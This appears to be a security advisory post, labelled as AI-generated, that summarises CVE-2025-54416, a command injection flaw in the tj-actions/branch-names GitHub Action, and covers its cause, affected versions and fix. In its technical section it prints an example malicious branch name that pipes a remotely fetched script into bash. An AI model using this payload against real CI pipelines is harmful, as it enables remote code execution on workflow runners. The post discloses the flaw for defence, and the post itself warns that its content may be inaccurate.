Summary of CVE-2025-54416: Command Injection in tj-actions/branch-names GitHub Action

This post provides a brief summary of CVE-2025-54416, a critical command injection vulnerability in versions 8.2.1 and below of the tj-actions/branch-names GitHub Action. The flaw allows arbitrary command execution via unsanitized branch or tag names. Patch details and technical exploitation information are included.
CVE Analysis

6 min read

ZeroPath CVE Analysis

ZeroPath CVE Analysis

2025-07-25

Summary of CVE-2025-54416: Command Injection in tj-actions/branch-names GitHub Action
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

A single malicious branch name can compromise an entire CI/CD pipeline if not properly sanitized. That is exactly what happened with tj-actions/branch-names, a popular GitHub Action used to extract branch and tag names in automated workflows. This vulnerability, tracked as CVE-2025-54416, enables arbitrary command execution in any workflow that consumes its output from versions 8.2.1 and below. With a CVSS score of 9.1, the risk is significant for any project relying on this action in collaborative or open environments.

About tj-actions/branch-names:

tj-actions is a GitHub organization that maintains a suite of workflow automation tools for GitHub Actions. The branch-names action is widely used in open-source and enterprise CI/CD pipelines to programmatically retrieve branch and tag names across all GitHub event types. Its popularity stems from its flexibility and ease of integration, making it a common dependency in many DevOps workflows.

Technical Information

CVE-2025-54416 is a command injection vulnerability resulting from improper input sanitization and unescaped output in the tj-actions/branch-names GitHub Action. The flaw occurs when branch or tag names containing shell metacharacters are not properly neutralized before being passed to downstream workflow steps. Attackers can exploit this by crafting branch or tag names that inject arbitrary shell commands into the workflow execution context.

The vulnerability specifically affects how the action exposes branch and tag names via its outputs. If a workflow step uses these outputs directly in a shell command, a maliciously crafted branch name can break out of the expected context and execute arbitrary commands. For example, a branch name such as:

"test") ${IFS} && {curl -sSfL gist.githubusercontent.com/[MALICIOUS-CONTENT].sh } | bash && echo "foo"

When this branch name is processed by the vulnerable action and used in a shell context, the injected commands are executed with the permissions of the workflow runner. The root cause is the lack of proper escaping and sanitization of user-controlled input, which is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command). The issue was addressed in version 9.0.0, which implements stricter output escaping and input validation.

Affected Systems and Versions

The vulnerability affects tj-actions/branch-names versions 8.2.1 and below. Any workflow that uses these versions and consumes branch or tag names as shell variables or command arguments is at risk, especially in repositories that accept contributions from untrusted users or external collaborators. The issue is fixed in version 9.0.0 and later.

Vendor Security History

tj-actions has responded to this vulnerability by releasing a fix in version 9.0.0 and publishing a detailed security advisory. No prior similar vulnerabilities were found in the public record for this action. The vendor's patch response was prompt following disclosure.

References

Detect & fix
what others miss